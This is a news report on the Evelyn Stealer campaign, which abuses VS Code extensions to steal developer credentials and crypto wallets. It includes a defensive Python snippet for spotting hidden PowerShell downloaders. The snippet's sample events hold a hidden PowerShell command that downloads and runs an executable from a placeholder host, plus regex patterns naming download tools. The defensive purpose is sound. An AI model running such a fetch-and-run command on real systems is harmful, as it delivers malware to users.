Evelyn Stealer campaign weaponizes Microsoft’s Visual Studio Code ecosystem

A newly observed malware campaign is targeting software developers with an information stealer called Evelyn Stealer, which weaponizes the Microsoft Visual Studio Code (VS Code) extension ecosystem.
According to Trend Micro researchers, the malware is designed to exfiltrate sensitive information, including developer credentials and cryptocurrency-related data.
Compromised developer environments can also be abused as access points into broader organizational systems, they said in an analysis published this week.
More specifically, the campaign weaponizes the VS Code extension ecosystem to deploy multistage information-stealing malware.
“This activity affects organizations with software development teams that rely on VSC and third-party extensions as well as those with access to production systems, cloud resources, or digital assets,” said Trend Micro.
Details of the campaign were first documented by Koi Security last month, which described three VS Code extensions that ultimately dropped a malicious downloader DLL; the DLL launched a hidden PowerShell command to fetch and execute a second-stage payload.
The executable then decrypts and injects the main stealer payload into a legitimate Windows process directly in memory. This allows it to harvest sensitive data and exfiltrate it to a remote server via FTP as a ZIP file.
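As an added example, not code from the Trend Micro or Koi Security write-ups, the following Python snippet shows how a defender might hunt for the chain described above in process-creation telemetry: a PowerShell instance whose ancestry includes VS Code, launched with a hidden window or with download cmdlets on its command line. The event records, paths and field names are constructed assumptions modelled on Sysmon event ID 1.

```python
import re
# Constructed Sysmon-style process events (not from the report); field names assumed.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 900, "cmdline": "Code.exe --type=extensionHost",
     "image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe"},
    # hidden PowerShell spawned beneath VS Code that fetches and runs a payload
    {"pid": 4388, "ppid": 4120, "image": PS, "cmdline":
     "powershell.exe -w hidden -nop -c \"iwr http://example.invalid/s2.exe "
     "-OutFile $env:TEMP\\s.exe; & $env:TEMP\\s.exe\""},
    # benign: a visible PowerShell task runner launched by the same editor
    {"pid": 4400, "ppid": 4120, "image": PS,
     "cmdline": "powershell.exe -NoProfile -File build.ps1"},
    # hidden PowerShell, but not descended from VS Code
    {"pid": 5012, "ppid": 1200, "image": PS,
     "cmdline": "powershell.exe -w hidden -c Get-Date"},
]

HIDDEN = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile"
                      r"|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b", re.I)

def is_vscode(image):
    return image.lower().endswith("\\code.exe")
def is_powershell(image):
    return image.lower().endswith(("\\powershell.exe", "\\pwsh.exe"))

def ancestors(events, pid, max_depth=5):
    """Walk the parent chain starting at pid, nearest ancestor first."""
    by_pid = {e["pid"]: e for e in events}
    chain, cur = [], by_pid.get(pid)
    while cur and len(chain) < max_depth:
        chain.append(cur)
        cur = by_pid.get(cur["ppid"])
    return chain

def find_suspicious(events):
    """Flag PowerShell beneath VS Code that looks like a hidden downloader."""
    hits = []
    for ev in events:
        if not is_powershell(ev["image"]):
            continue
        if not any(is_vscode(a["image"]) for a in ancestors(events, ev["ppid"])):
            continue
        reasons = [name for name, rx in (("hidden window", HIDDEN),
                   ("download cmdlet", DOWNLOAD)) if rx.search(ev["cmdline"])]
        if reasons:
            hits.append((ev["pid"], reasons))
    return hits
```

Only the hidden, downloading PowerShell under VS Code is flagged; the visible build task and the hidden process outside the editor's lineage are left alone, which is the distinction that keeps such a rule usable on developer workstations.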
According to Trend Micro, the data pilfered by Evelyn Stealer includes clipboard content, a list of installed applications, cryptocurrency wallets, running processes, desktop screenshots, stored Wi-Fi credentials, system information, and the credentials and cookies stored by Google Chrome and Microsoft Edge.
The malware also implements checks to detect analysis tools and virtual environments, and it terminates active browser processes so that data collection proceeds without interference from defenders.
“The Evelyn Stealer campaign reflects the operationalization of attacks against developer communities, which are seen as high-value targets given their important role in the software development ecosystem,” said Trend Micro.